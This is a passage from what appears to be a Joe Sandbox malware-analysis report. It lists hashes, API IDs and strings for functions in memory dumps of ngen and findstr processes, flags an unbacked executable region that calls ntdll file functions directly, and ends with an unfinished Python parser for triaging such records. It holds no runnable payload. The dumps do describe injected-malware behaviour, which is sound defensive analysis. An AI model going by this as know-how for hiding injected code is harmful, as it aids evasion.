                                                • Opcode Fuzzy Hash: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                • Instruction Fuzzy Hash: 4290023630181406D10071584848747416587D0302F95C011AA168555E8669CD956932
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                • Instruction ID: 35196ec29855047fd303dfa2815cd6001acebc040e89584b407f942967f90691
                                                • Opcode Fuzzy Hash: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                • Instruction Fuzzy Hash: 99900226701410464140716888849068165ABE1211795C121A599C550D855D8D695A76
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                • Instruction ID: 076d06649f0bb863efb2c68677fe0ad041fefa780b13b3217dce8012c366944a
                                                • Opcode Fuzzy Hash: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                • Instruction Fuzzy Hash: 6D900226311C1046D20075684C54B07416587D0303F95C115A5158554CC9198D655932
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                • Instruction ID: 2c7ff88f4bd3b78df9bc7978d92964115453eace1cbc3e6afb88059d8e3dca52
                                                • Opcode Fuzzy Hash: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                • Instruction Fuzzy Hash: 8490026634141446D10071584454B064165C7E1301F95C015E6068554D861DCD566537
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                • Instruction ID: 6f1977711fdf9236d4c52d9bd34bc22c56445acf8c8da7e6de7cfc7de8306834
                                                • Opcode Fuzzy Hash: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                • Instruction Fuzzy Hash: 9F90026631141046D1047158444470641A587E1201F95C012A7158554CC52D8D655536
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                • Instruction ID: e73fe5ccc357356f5cac764e49ebc56a20e155419506f5fdde94e9e8e7bb17d0
                                                • Opcode Fuzzy Hash: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                • Instruction Fuzzy Hash: B590022670141506D10171584444616416A87D0241FD5C022A6028555ECA298E96A532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                • Instruction ID: f10a36b35e1ac487c77c9605fd577e34a3e73a504781c10bf26aa296ee6269f1
                                                • Opcode Fuzzy Hash: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                • Instruction Fuzzy Hash: 5790027630141406D14071584444746416587D0301F95C011AA068554E865D8ED96A76
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                • Instruction ID: bdd0160877ca3c05706b614ff8ee1dc0ded489c3953f809c3a662e32ea34b1be
                                                • Opcode Fuzzy Hash: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                • Instruction Fuzzy Hash: 8790026630181407D14075584844607416587D0302F95C011A7068555E8A2D8D556536
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                • Instruction ID: 7f2fc765ab6f0fe78d9a201fe1979d7612ea8817c95a3a6ca5148352f6ec221c
                                                • Opcode Fuzzy Hash: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                • Instruction Fuzzy Hash: 4790022630141406D102715844546064169C7D1345FD5C012E6428555D86298E57A533
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                • Instruction ID: 6170115a24d55ef439fd8632e6d62cf4b830c8aa07fa09f2168057886920c0c2
                                                • Opcode Fuzzy Hash: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                • Instruction Fuzzy Hash: D190022634546106D150715C44446168165A7E0201F95C021A5818594D85598D596632
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                • Instruction ID: 1fa0ffa6be2c4802569d8444a158983cd65fb459e0d4debff1013a3faa00a1c7
                                                • Opcode Fuzzy Hash: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                • Instruction Fuzzy Hash: 4A90023630141806D10471584844686416587D0301F95C011AB028655E96698D957532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                • Instruction ID: 4fd6bf1631be82dff9306ece0a15ef12c2be6c5cadc597450738a4491543d63f
                                                • Opcode Fuzzy Hash: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                • Instruction Fuzzy Hash: 6090023670541806D15071584454746416587D0301F95C011A5028654D87598F597AB2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                • Instruction ID: 09dfcaff3c26619f44f0f0698c112113010e2361b0cfae6764f4b555a6dd72eb
                                                • Opcode Fuzzy Hash: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                • Instruction Fuzzy Hash: B290023630545846D14071584444A46417587D0305F95C011A5068694D96298E59BA72
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                • Instruction ID: 949777aa5ca4a8a589c69ef097c4084df54cd823a200bdf9c1b724e87721edf2
                                                • Opcode Fuzzy Hash: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                • Instruction Fuzzy Hash: 4790023630141806D1807158444464A416587D1301FD5C015A5029654DCA198F5D7BB2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                • Instruction ID: e7219ba8c2d2a48c5a3eb8896d64a3a7d355f047cfa1208903dc1444de1b5000
                                                • Opcode Fuzzy Hash: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                • Instruction Fuzzy Hash: E59002A6301550964500B2588444B0A866587E0201B95C016E6058560CC5298D559536
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                • Instruction ID: 2aadb0db10ad88967ee73f35420036ff6bdb5c42ea3b23cd7a4c14c6d85b5beb
                                                • Opcode Fuzzy Hash: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                • Instruction Fuzzy Hash: D890022A311410070105B558074450741A687D5351395C021F6019550CD6258D655532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
                                                • Instruction ID: c3b277522ea9d2cb8ccd21fae58bece0b9f8373de8f20d1b1a2f0ed5f248d638
                                                • Opcode Fuzzy Hash: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
                                                • Instruction Fuzzy Hash: 4690022A321410060145B558064450B45A597D63513D5C015F641A590CC6258D695732
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 3c3ebd2abaf183f79674e8668d8e15843a04af5e87211478a4b469b3f7b2c1fe
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                • Instruction ID: b8b8133937d35484b50f03cb6e4c44b4e43a17056b0d5d4cf19e3c576f0a7098
                                                • Opcode Fuzzy Hash: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                • Instruction Fuzzy Hash: 6151EBB5A0411ABFCB14DB9C889497EFBF9FB0C200B54816DECDAD7681E634DE0487A0
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 058F4725
                                                • ExecuteOptions, xrefs: 058F46A0
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058F46FC
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 058F4655
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 058F4742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 058F4787
                                                • Execute=1, xrefs: 058F4713
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                • Instruction ID: 8de5f2b2e89815e4d8e201249c3e70742734e39bdc983c9f3e63af8b85725f5d
                                                • Opcode Fuzzy Hash: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                • Instruction Fuzzy Hash: 9051E73160431D6AEF10EA68DC99FFA77ADFB49304F040099ED05E7291EBB09E45CB55
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: e6f8a4cfd6d4e893356fe3e41cd4c2b82b304ca20aa30439299803e5fd04c29d
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 84816D70A49A499BDF24CE68C853BBEBFA2BF45352F98419DDC92E7290C734DC408B51
                                                Strings
                                                • RTL: Resource at %p, xrefs: 058F7B8E
                                                • RTL: Re-Waiting, xrefs: 058F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 058F7B7F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                • Instruction ID: 1a8e9b0f80d436739cf9dcc25ee3a47e7db1cc29561ae338e43b47dd248b5fce
                                                • Opcode Fuzzy Hash: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                • Instruction Fuzzy Hash: 214190317047069FE720DE298840B6AB7EAEB89711F100A1DED9AD7780DB71E905CB91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058F728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 058F72A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 058F7294
                                                • RTL: Re-Waiting, xrefs: 058F72C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                • Instruction ID: aa99eb68d245e4a3ade4dca369a9ddfa8b295d8daedcf2bcc4a2be51b9dc1640
                                                • Opcode Fuzzy Hash: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                • Instruction Fuzzy Hash: 2A41AC31704206ABE721DE25CC41FAAB7E6FB88715F100619ED56EB380DB71EC52CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: e9491f2c6b8e202d4cf83bbe625c599dc4217d1d2f9e5faccd44b52b0f84549d
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 7391AE71E1420A9ADB24DE69C881ABEBFA6FF45720F14459EEC65E72C0E730DD418F20
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                • Instruction ID: ec018552d137b5ccff5d8adadf4cf4045f39d5c9233c3e71e9c0e8672724541c
                                                • Opcode Fuzzy Hash: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                • Instruction Fuzzy Hash: 98812975D042699BDB25DB54CC44BEAB7B8BB09710F0441EAED1AF7240D7309E81CFA1

                                                Execution Graph

                                                Execution Coverage:2.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.7%
                                                Total number of Nodes:419
                                                Total number of Limit Nodes:68
                                                execution_graph: the rendered call graph (node IDs, addresses and edge lists) survives only as a run of numbers and is not reproduced here. What it shows: the graph covers the process 7 region at 02E40000 (snapshot hcaresult_7_2_2e40000_findstr, the same region as the FindFirstFileW, NtCreateFile and NtReadFile functions listed below), and its leaf nodes are calls to NtClose, NtCreateFile, NtReadFile, NtDeleteFile, LdrLoadDll, RtlAllocateHeap, RtlFreeHeap, CoInitialize, CreateThread, CreateProcessInternalW, WSAStartup, SetErrorMode, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, PostThreadMessageW and Sleep, reached through a set of stubs at 36C2xxx-36C4xxx labelled LdrInitializeThunk.
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E5BFF1
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02E5C02E
                                                • FindClose.KERNELBASE(?), ref: 02E5C039
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                                                • Instruction ID: 37c35c0fe69892d6fb7ca4c410917133015943b4bccaf770ca39437b850c2eff
                                                • Opcode Fuzzy Hash: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                                                • Instruction Fuzzy Hash: 05319271980318BBDB21DF60CC85FFF777D9F44758F249559B908A7180DB70AA858BA0
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02E67EB3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                                                • Instruction ID: 54baf6000d415dc80814203ebe755d970e78da90ce795bc45b2d05739d79df99
                                                • Opcode Fuzzy Hash: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                                                • Instruction Fuzzy Hash: 6731D0B5A44608AFCB14DF99D880EEEB7B9EF8C754F108219F918A7340D730A951CFA4
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02E67FF8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                                                • Instruction ID: 4bc270fa5ae61cef6339df1d82d2320801a6f7b906d106c86750570eed01f49f
                                                • Opcode Fuzzy Hash: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                                                • Instruction Fuzzy Hash: 8E31C2B5A40208AFCB14DF99D881EEFB7B9EF8C754F118219F918A7340D770A951CBA4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                                                • Instruction ID: a098023d586cf63a7d5cb15449a68cd584c83a68d45ee31d943a8a6625cdd3a2
                                                • Opcode Fuzzy Hash: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                                                • Instruction Fuzzy Hash: 0701C071680304BFD620EB69DC09FBB736DDF88750F508509FA09AB280D7B179118BE5
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E680C7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction ID: c1b6b2fd9828fc6c843657cd28566b86ca2ecdee4539ebd5f122c98ab2feadd5
                                                • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction Fuzzy Hash: 96E04636240254BBC620AA6ADC04F9B776EDFC9764F518415FA08AB241CBB1B9118AB0
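The records above all come from a region dumped at 02E40000 in process 7 that the report marks "based on PE: false", i.e. executable memory with no module on disk behind it, and the functions in it call NtCreateFile, NtReadFile and NtClose in ntdll directly. When triaging many such reports it helps to pull these records into a structured form so that the unbacked-region call sites can be pivoted on. The Python below is an added example, not code from the Joe Sandbox report or from Joe Sandbox itself: it parses a constructed sample of three records copied in the same line shape as above, treats each "APIs" heading as the start of a record, and assumes that the fifth dotted field of the dump file name is the region's page protection (0x40 being PAGE_EXECUTE_READWRITE); that field interpretation is an assumption about the naming scheme, not something the report states.

```python
"""Added example (not part of the report or of Joe Sandbox): parse the function
records in the layout shown above and pivot on their memory-region metadata."""
import re
from dataclasses import dataclass, field

# Constructed input: three records copied in the line shape of the report text
# (Opcode/Instruction ID and String ID lines left out to keep the sample short).
SAMPLE_REPORT = """\
APIs
• NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02E67EB3
Memory Dump Source
• Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
Yara matches
Similarity
• API ID: CreateFile
• Instruction Fuzzy Hash: 6731D0B5A44608AFCB14DF99D880EEEB7B9EF8C754F108219F918A7340D730A951CFA4
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E680C7
Memory Dump Source
• Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
Yara matches
Similarity
• API ID: Close
• Instruction Fuzzy Hash: 96E04636240254BBC620AA6ADC04F9B776EDFC9764F518415FA08AB241CBB1B9118AB0
APIs
Memory Dump Source
• Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
Similarity
• API ID: InitializeThunk
• Instruction Fuzzy Hash: DB900235A05814129140B5584888546401597E0301B59C011E0424654D8B548A565361
"""

PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant

# Dump name: <pid>.<stage>.<timestamp>.<base>.<protect>.<x>.<y>.<z>.sdmp
# ASSUMPTION: the field right after the base address is the region's page protection.
SOURCE_RE = re.compile(
    r"Source File: (?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})(?:\.[0-9A-F]{8}){3}\.sdmp, Offset: [0-9A-F]+, "
    r"based on PE: (?P<pe>true|false)", re.IGNORECASE)
API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\([^)]*\), ref: (?P<ref>[0-9A-F]+)$")


@dataclass
class FunctionRecord:
    pid: int = 0
    base: int = 0
    protect: int = 0
    pe_backed: bool = False
    api_id: str = ""
    instruction_fuzzy_hash: str = ""
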